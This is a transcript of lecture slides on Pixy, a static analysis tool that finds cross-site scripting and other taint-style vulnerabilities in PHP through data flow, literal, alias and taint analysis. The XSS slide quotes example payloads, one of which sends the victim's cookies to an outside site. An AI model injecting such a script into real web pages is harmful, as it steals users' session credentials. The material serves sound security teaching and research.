Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic,...
-
Upload
darleen-watson -
Category
Documents
-
view
222 -
download
0
Transcript of Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic,...
Pixy: A Static Analysis Tool forDetecting Web Application VulnerabilitiesNenad Jovanovic, Christopher Kruegel, Engin Kirda
Secure Systems LabVienna University of Technology
Proceedings of the IEEE Symposium on Security and Privacy. (May 2006)
2008/10/2 2
Outline
Introduction Taint-Style Vulnerabilities Data Flow Analysis Empirical Results Conclusions Comments
2008/10/2 3
Introduction(1/2)
There are urgent need for automated vulnerability detection in Web apps development.
The existing approaches for mitigating threats to Web apps can be divided into client-side and server-side solutions
Server-side solutions: Static approaches
Scan source code for vulnerabilities Dynamic approaches
Detect while executing the audited program
2008/10/2 4
Introduction(2/2)
Pixy The first open source tool for statically detecting
XSS vulnerabilities in PHP4 code by means of data flow analysis
It can be applied to other taint-style vulnerabilities such as SQL injection or command injection
http://pixybox.seclab.tuwien.ac.at/pixy/index.php
2008/10/2 5
Taint-Style Vulnerabilities(1/2) Of all vulnerabilities in Web apps, problem caused b
y unchecked input are recognized as being the most common Inject malicious data in Web applications Manipulate applications using malicious data
The authors refer to this class of vulnerabilities as the tainted object propagation problem
Referenced from “Finding security errors in Java programs with static analysis,. in Proceedings of the 14th UsenixSecurity Symposium, Aug. 2005”
2008/10/2 6
Taint-Style Vulnerabilities(2/2) Tainted data
Originate from potentially malicious users Cause security problems at vulnerable points in the program
(called sensitive sinks) May enter the program at specific places, and can spread via
assignment and similar constructs Can be untainted (sanitized) using a set of operations
Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. Differ only with respect to concrete values of few parameters
2008/10/2 7
Cross-Site Scripting (XSS)(1/2) Occurs when dynamically generated Web pages
display improperly validated input An attacker may embed malicious JavaScript code
into dynamically generated pages of trusted sites. hijack the user account credentials change user settings steal cookies insert unwanted content into the page
2008/10/2 8
Cross-Site Scripting (XSS)(2/2) Reflected Cross-Site Scripting Attacks
Stored Cross-Site Scripting Attacks An attacker's malicious script is rendered more than once
<script>alert('Hello World');</script>
<a href=“/usercp.php?action=logout”>一個關於兔子的網頁 </a>
<script>location.replace('http://rickspage.com/?secret='+document.cooki
e)</script>
2008/10/2 9
Properties of XSS
Entry Points into the programs GET: $_GET POST: $_POST COOKIE: $_COOKIE entry points grows when the “register globals” is active
Sanitation Routines htmlentities(), htmlspecialchars(), and type casts
Sensitive Sinks echo() print() printf()…
2008/10/2 10
Data Flow Analysis(1/4)
Goal: To determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized. Identify the taint value of variables used in these sinks
Statistically compute certain information for every single program point (or for coarser units such as functions)
PHP Front-End construct a parse tree for PHP input file transformed into linearized form resembling three-address code (TAC), a
nd kept as a control flow graph for each encounter function Assembly-like language At most 3 operands “x = y op z”
2008/10/2 11
Data Flow Analysis(2/4)
Operates on the control flow graph (CFG) of a program A data structure built on top of the intermediate code representati
on abstracting the control flow behavior of a function that is being
compiled Node – atomic statement of program Edge – flow of control
2008/10/2 12
Literal Analysis: Basics
Purpose: To determine, for each program point, the literal that a variable or a constant can hold.
Can improve the precision of the overall analysis by: Evaluate branch conditions Ignore program paths that cannot be executed at runtime (called
path pruning) Resolution of non-literal include statements, variable variables,
variable array indices, and variable function calls (only for potential uses)
After performing literal analysis each CFG node is associated with information about which literal
is mapped to a variable before executing that node
2008/10/2 13
How Data Flow Analysis is Used to Perform Literal Analysis Assume a fictitious
programming language One variable (v) Two literals (the integer 3
and 4)
“skip” node empty instruction
“Ω” Unknown literal
2008/10/2 14
Data Flow Analysis(3/4)
Carrier Lattice Information about program represented
using values from algebraic structure Every information that could ever be
associated with a CFG node by the analysis must be contained as an element of the used lattice
Bottom element : “not visited yet” at the biginning Line: ordering between elements regard to precision Least upper bound : the smallest element that is greater than or
equal to both of the elements. Needed by the analysis algorithm
2008/10/2 15
Data Flow Analysis(4/4)
Transfer Function f: PP for each node in control flow graph
Input: a lattice element Output: a lattice element
Models effect of the node on the program information Each CFG node is associated with such a transfer fun
ction
2008/10/2 16
Literal Analysis: Basics
Carrier Lattice Definition Provides mappings for all variables and constants
that appear in the scanned program Able to describe the mapping to any possible
literal (infinite)
2008/10/2 17
Literal Analysis: Basics
Transfer Function Definition PHP without explicit type declarations “Hidden” array
2008/10/2 18
Four cases in order of increasing complexity
1. Not an array element and not
known as array strong update
2. An array, but not an array element Array tree
3. Element without non-literal indices (may be an array) strong overlap
2008/10/2 19
Four cases in order of increasing complexity4. An array element with non-literal indices and maybe an array
weak overlap algorithm: all overwrite operations are replaced by least upper bound operations
Array elements with one or more non-literal indices are permanently mapped to Ω
2008/10/2 20
Alias Analysis
Ignoring the information of alias relationships would prevent literal analysis from producing correct results in a number of cases.
Without alias analysis, literal analysis can’t decide that $a also affects $b
$b remain unchanged and be incorrect!
2008/10/2 21
Carrier Lattice Definition Alias group: a group of variables referencing the same
memory location Modeling alias information through sets of alias group s
ets (…): an alias group {…}: an alias group set
Must-aliases of a variable “{(a,b) (c)}” $b: must-alias of $a
May-aliases of a variable “{(a,b) (c)} {(a,c) (b)}” $b and $c: may-aliases of $a
The order among lattice elements is defined as subset inclusion
2008/10/2 22
Static analysis is not able to decide which path the program will take Under the assumption that the condition is determined by dy
namic factors Environment variables, user input
2008/10/2 23
Transfer Function Definition
Reference assignment “$a = & $b”
Unset node Own one-element alias group f
or each alias group set
Global node Equally-name variable from the
global scope on the right side
“global $a;” The authors only consider references to simple variables
2008/10/2 24
Literal Analysis Revisited
Here we only consider references to simple variables Functions built into PHP are conservatively modeled as returning Ω
since the increased precision is expected to be rather small only built-in function modeled precisely is “define”
2008/10/2 25
Literal Analysis Revisited The transfer function at the call preparation node stores the alia
s information for the local variables of the calling function, and resets it to its default (initial) value
On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.
2008/10/2 26
Taint Analysis
Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant.
Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities
2008/10/2 27
Taint Analysis Carrier Lattice Definition
Tainted: if it can hold a malicious, not yet sanitized (checked) value originating from user input
Not map to Ω but to the tainted values tainted and untainted mapped to tainted: this variable might be tainted. mapping to untainted: this variable is untainted. whenever the analysis cannot determine, it is conservatively a
ssumed to be tainted
2008/10/2 28
Taint Analysis Transfer Functions Definition
Implicitly casting a tainted variable into an integer untaints this variable (with unary operators such as +, -, and (int))
Correctly model built-in PHP functions can reduce the number of false positives Pixy processes a specification file on startup which contains a
bstracted versions of some built-in functions in PHP syntax “htmlentities” and “array” return $_UNTAINTED
2008/10/2 29
Taint Analysis
Using the Analysis Results Generating warnings that point the developer to p
ossible XSS vulnerabilities at the end of the analysis is straightforward. The analysis information for each sensitive sink is searc
hed for tainted input variables a A warning message indicating the corresponding line is i
ssued if such a violation is discovered
2008/10/2 30
Limitations
Pixy does not support object-oriented features of PHP. Malicious data can never arise from such construc
ts. Files included with “include” and similar keyw
ords are not scanned automatically The authors frequently observed false positives st
emming from these lacking file inclusions Eliminated through manual inclusion
2008/10/2 34
Conclusions
A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities
Additional literal analysis and alias analysis to improve correctness and precision of taint analysis
Pixy, an open-source Java tool that implements these analysis technique
Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate
2008/10/2 35
Comments
The first to perform alias analysis for an untyped, reference-based scripting language such as PHP
Beyond the scope of the paper Recursive calls depends on dynamic information Infinite call depth for non-terminating programs
The implementation is widely used by the public. Future work
automatic inclusion of “include” files